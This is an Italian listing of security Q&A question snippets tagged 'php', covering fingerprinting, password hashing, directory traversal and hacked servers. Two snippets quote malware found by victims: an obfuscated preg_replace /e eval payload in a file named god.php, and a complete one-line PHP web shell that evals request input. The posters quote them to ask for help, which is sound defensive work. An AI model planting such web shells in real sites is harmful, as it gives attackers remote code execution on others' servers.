Domande con tag 'php'

domande con tag
1
risposta

Come whoer.net è in grado di ottenere il sistema operativo e il modem del tuo TCP / IP e la sua versione

Durante l'esecuzione del test su link Nella sezione SO, colonna TCP / IP, ho il kernel di Windows NT [generico] (Ethernet o modem, MTU: 1500) La domanda sarebbe: come fanno a farlo ed è possibile spoofarlo? La cosa più importante è ch...
posta 15.02.2018 - 13:31
1
risposta

Ottenere un rilevamento PHISH / Zmate.omna di Avira quando aggiorno la mia pagina, ma gli scanner di siti Web online mostrano che la pagina è pulita

Ricevo un riconoscimento PHISH / Zmate.omna di Avira quando aggiorno la mia pagina, mostrando che è stata inserita nella cache di Chrome. Ma ho provato diversi scanner di siti web / url online, e stanno tutti mostrando che la pagina è pulita....
posta 26.01.2018 - 08:43
1
risposta

PHP - Password_hash / Argon2i tronca efficacemente le password dopo una certa lunghezza?

Se non sbaglio, per impostazione predefinita il password_hash di PHP con PASSWORD_ARGON2I genera tra le altre cose un hash alfanumerico di 43 caratteri. Mentre ciò significa che le password semplici che sono più corte di 43 caratteri o...
posta 25.03.2018 - 21:14
1
risposta

Backdoor PHP sul server live [duplicato]

Improvvisamente uno dei nostri siti web Wordpress ha iniziato a inviare e-mail di spam ed è stato inserito nella lista nera su MXToolBox. Quindi con il supporto del server ho scansionato i file e trovato uno strano file chiamato timer.php...
posta 02.01.2018 - 06:43
1
risposta

Stop all'attacco di directory traversal con .htaccess?

È possibile configurare .htaccess per bloccare le richieste PHP per accedere agli elementi sopra la cartella principale? diciamo che uno script malevolo è stato inserito in una cartella e potrebbe richiedere l'accesso a "../../../../configure...
posta 23.11.2017 - 17:57
1
risposta

Matrice in richieste HTTP GET / POST

Nella programmazione del server PHP, le richieste GET / POST codificate URL vengono analizzate in tipo "array" associativo al momento della ricezione. Per la maggior parte del tempo, gli argomenti di query possono essere considerati stringhe, tu...
posta 22.02.2018 - 03:29
1
risposta

Cercando di fare una richiesta multipart postata, nginx e php restituiscono entrambi l'errore 400

Sto provando a usare il protocollo Chunked e il protocollo multipart in una richiesta POST, come questa Tutti i simboli di nuova riga sono \r\n , ad es. POST http://127.0.0.1/print.php?a=1&b=2 HTTP/1.1 accept-language: * transfer-en...
posta 05.10.2017 - 10:19
1
risposta

Si tratta di una specie di attacco di hacker?

Sto utilizzando uno strumento sul mio sito Web che rileva eventuali errori e mi invia un'email quando si verifica un errore di codice. Recentemente, ho ricevuto alcune richieste non consentite sul mio IP - non url - dove è consentito solo GET....
posta 11.10.2017 - 11:29
1
risposta

Strano file PHP trovato sul server web [duplicato]

Ho trovato un file PHP molto strano con una regexp molto lunga in un server web del cliente. Il file si chiama 'god.php', e questo è il loro contenuto: <?php preg_replace("/.*/e", "\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74...
posta 24.07.2017 - 18:14
3
risposte

Come posso determinare da dove proviene lo script iniettato?

Ho un server che al momento è stato violato. I file vengono creati sul mio server con contenuti di questo tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O come questo: <?php /*auV*/if/*fpFF*/(i...
posta 20.07.2017 - 13:25